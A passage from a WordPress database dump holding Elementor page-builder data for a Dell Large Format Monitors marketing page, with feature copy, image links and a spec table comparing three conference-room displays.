:\"space\";i:9;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:1;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:1;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:2:{s:11:\"youtube_url\";i:1;s:8:\"autoplay\";i:1;}}}}}'),(8755,3673,'_elementor_css','a:5:{s:4:\"time\";i:1571995898;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8767,3675,'_elementor_edit_mode','builder'),(8768,3675,'_elementor_template_type','wp-page'),(8769,3675,'_elementor_version','2.7.4'),(8770,3675,'_wp_page_template','template-fullwidth.php'),(8771,3675,'_elementor_data','[{\"id\":\"1428c7d\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"10c0343\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":32.072},\"elements\":[{\"id\":\"c13c1a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_02.jpg\\\" alt=\\\"Transform your meeting space\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eaf7a1e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":67.928,\"content_position\":\"center\"},\"elements\":[{\"id\":\"c18c5e2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Transform your meeting space<\\/h2><\\/div><div>Dell, the world\\u2019s number one monitor brand, has the tools and technology you need to facilitate teamwork. With our open standards approach and\\u00a0wide variety of displays ranging from 55\\u201d to 86\\u201d, it\\u2019s easy to find and\\u00a0customize a solution\\u00a0that keeps your team engaged and lets your business thrive.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a29589\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d94f107\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0d139f5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02b0460\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"23442a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"4c2a77c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Maximize your team\\u2019s productivity<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2222c78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a87a431\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_03.jpg\\\" alt=\\\"Maximize your team\\u2019s productivity\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df1a833\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"229d78d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f465b01\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6dddbc3\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ad2406f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.64},\"elements\":[{\"id\":\"f0cdfa8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_04.jpg\\\" alt=\\\"Next-level teamwork\\\" width=\\\"347\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8bd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.36,\"content_position\":\"bottom\"},\"elements\":[{\"id\":\"de42688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Next-level teamwork<\\/h2><\\/div><div><strong>More ways to interact:<\\/strong>\\u00a0Group collaboration is more seamless and intuitive than ever with our interactive monitors<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br \\/><br \\/><\\/div><div><p><strong>Collaboration solutions:<\\/strong>\\u00a0Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>.<br \\/><br \\/><strong>Collaboration for all:<\\/strong>\\u00a0Dell Screen Drop feature<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0lets you lower the displayed image so that it\\u2019s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5029420\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b8e6817\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29544d8\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01f3af0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f845c7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"6933422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Captivate your audience<\\/h2><\\/div><div><ul><li><strong>Make the most of your meeting:<\\/strong>\\u00a0With a wide variety of connectivity options, you can quickly connect to the display and seamlessly switch between presenters, allowing your audience to enjoy a smooth and continuous presentation.<\\/li><\\/ul><ul><li><strong>Present crisply and clearly:<\\/strong>\\u00a0Monitor scaling technology allows you to capture your audience\\u2019s attention with exceptionally clear text and vivid visuals.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7a70680\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"670e9e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_05.jpg\\\" alt=\\\"Captivate your audience\\\" width=\\\"360\\\" height=\\\"267\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a4b5b73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0df3684\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb72a42\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67af6a3\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"1823f82\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2c8aa0a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dell Large Format Monitors\",\"align\":\"center\",\"title_color\":\"#353535\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73d6a89\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4bd9f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2816dd3\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=Z98yJnbXWq8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\",\"autoplay\":\"yes\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"746f096\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0102d24\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"249ca4a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d291a0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"6228508\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7c029ba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Flexible IT solutions<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">A variety of customization, deployment and management options make Dell Large Format Monitors easy to manage.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fca6377\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"32f148a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_06.jpg\\\" alt=\\\"Flexible IT solutions\\\" width=\\\"445\\\" height=\\\"351\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f0d8bc3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"be5af88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"28958ec\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b7a77eb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5bc9eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e074cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_07.jpg\\\" alt=\\\"Adapts to business needs. Present and future.\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b39d618\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4f1e8d4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Adapts to business needs. Present and future.<\\/h2><\\/div><div><ul><li><strong>Solutions that work with you:<\\/strong>\\u00a0Dell Large Format Monitors work with a variety of hardware and software, so you can continue using the technology you\\u2019re comfortable with or choose to use some of ours. This makes your new monitor inherently easy to deploy, maintain and use. It can also\\u00a0be loaded with your preferred corporate image, so that it adheres to your security and service standards.<\\/li><\\/ul><ul><li><strong>Customized to your needs:<\\/strong>\\u00a0Your Large Format Monitor will fit your business needs as they evolve. Select the technology you need without paying for unnecessary features and, with its modular capabilities, you can even scale up or down as your needs change.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7383992\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4264633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"494b60f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9282776\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"91efb53\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"758e0fa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Easy to deploy. Simple to manage.<\\/h2><\\/div><div><ul><li><strong>A smooth deployment:<\\/strong>\\u00a0With a few painless steps, and a couple of extra hands, it\\u2019s simple to install a Dell Large Format Monitor to a solid wall. Our displays are VESA compatible, so you can pick the mounting solution that best fits your space, whether that\\u2019s a mobile cart, stand or wall mount.<\\/li><li><strong>Manage your meeting spaces:<\\/strong>\\u00a0With RS232 and RJ45<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0interfaces, you can use remote management tools to maintain and control your Large Format Monitors with a network control system.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7ed52d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"35ef182\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_08.jpg\\\" alt=\\\"Easy to deploy. Simple to manage.\\\" width=\\\"355\\\" height=\\\"263\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3643da4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"eba13d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"99eb408\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_09.jpg\\\" alt=\\\"Ultimate management\\\" width=\\\"337\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84d2d5e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"857f2f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Ultimate management<\\/h2><\\/div><div><ul><li><strong>Seamless integration for easy access:<\\/strong>\\u00a0Create an all-in-one solution with the optional Dell OptiPlex Micro PC. It seamlessly integrates into the display<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0without the need for a separate power cord, simplifying access to WiFi, annotation\\u00a0and\\u00a0meeting room management applications.<\\/li><li><strong>Easy to upgrade:<\\/strong>\\u00a0Thanks to\\u00a0it\'s\\u00a0modular design, the optional Dell OptiPlex Micro PC can be effortlessly upgraded, or replaced.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0986c04\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea07f49\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8d2e27\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"651dcf7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"e0e5fdb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"e3c5aec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Solutions you can count on<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Our low maintenance monitors and reliable service solutions are here to support you through every presentation.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7c7592f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"8349623\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_10.jpg\\\" alt=\\\"Solutions you can count on\\\" width=\\\"412\\\" height=\\\"325\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b154bbe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8c77514\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ab08df2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eb13a0c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"69147c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":34.955},\"elements\":[{\"id\":\"ff020de\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_11.jpg\\\" alt=\\\"Dependable reliability\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e1222e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":65.045},\"elements\":[{\"id\":\"1b3c901\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Dependable reliability<\\/h2><\\/div><div><strong>Peace of mind comes standard:<\\/strong>\\u00a0Your Large Format Monitor comes with a 3-year Advanced Exchange Service<a class=\\\"technote microcontent\\\" rel=\\\"technotes:advanced-exchange-service-monitors\\\">*<\\/a>\\u00a0so that if a replacement becomes necessary, it will be shipped to you the next business day during the Limited Hardware Warranty. And, if you want longer-term coverage, you can extend the Limited Hardware Warranty<a class=\\\"technote microcontent\\\" rel=\\\"technotes:hardware-warranty-monitors\\\">*<\\/a>\\u00a0up to 5-years for additional support.<br \\/><br \\/><strong>Low maintenance. Simple manageability:\\u00a0<\\/strong>Save your staff time and your company money with these reliable, user-friendly monitors. With no hidden costs, annual maintenance or licensing fees, Dell Large Format Monitors can decrease both trouble tickets and training time for your team.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"95edd1d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"542b068\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2c3e21d\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a24ced\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"c0cc680\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e29177f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6295038\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C5519Q<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8b359d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"051af0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C5518QT<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da22a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a4304b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">C7017T<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"44f258e\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"4a78e3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"132399f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"531c7ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c5519q\\/global_spi\\/monitor-c5519q-campaign-hero-504x350-ng.psd?fmt=jpg\\\" alt=\\\"C5519Q Monitor\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"76134a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d51c658\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c5518qt\\/pdp\\/dell-monitor-c5518qt-pdp-03-v2.jpg?fmt=jpg\\\" alt=\\\"Dell Monitor C5518QT\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4560da4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"19ac253\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><p><img src=\\\"https:\\/\\/i.dell.com\\/is\\/image\\/DellContent\\/\\/content\\/dam\\/global-site-design\\/product_images\\/peripherals\\/output_devices\\/dell\\/monitors\\/c_series\\/c7017t\\/global_spi\\/dell-monitor-c7017t-black-right-usage-hero-504x350-ng.psd?fmt=png-alpha\\\" alt=\\\"Dell 70 (C7017t) Conference Room Monitor\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df69254\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"7110fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38f6a9a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Resolution<\\/strong><br \\/><strong>OptiPlex Micro Mounting via<\\/strong><br \\/><strong>Touch\\/Non-Touch<\\/strong><br \\/><strong>Image Size<\\/strong><br \\/><strong>Panel Type<\\/strong><br \\/><strong>Surface<\\/strong><br \\/><strong>Mount<\\/strong><br \\/><strong>Connectivity<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bc54c67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0e720c0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>Optional bracket<br \\/>Non-touch<br \\/>54.6 in<br \\/>Vertical Alignment Glass<br \\/>Anti-glare<br \\/>Optional wall mount<br \\/>2x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>4x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"496feb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3b3a4fe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>4K<br \\/>PC slot<br \\/>20 points of touch<br \\/>54.6 in<br \\/>IPS Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Optional wall mount<br \\/>3x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>7x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"32d0318\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2186554\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Full HD<br \\/>Optional bracket<br \\/>10 points of touch<br \\/>69.5 in<br \\/>Vertical Alignment Glass<br \\/>Anti-glare, Anti-smudge<br \\/>Wall mount included<br \\/>3x HDMI<br \\/>1x DisplayPort<br \\/>1x VGA<br \\/>4x USB<br \\/>1x Audio-In\\/-Out<br \\/>1x RS232<br \\/>1x RJ45<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7995cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"2e6862a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3147a86\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: right;\\\"><strong>Mount<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a36ed2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f952d0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5dd861a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"17c56c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Optional wall mount<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a4c7b0b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98647d5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wall mount included<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b54172e\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"a5d7418\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"9a5bdd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8ed1991\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton 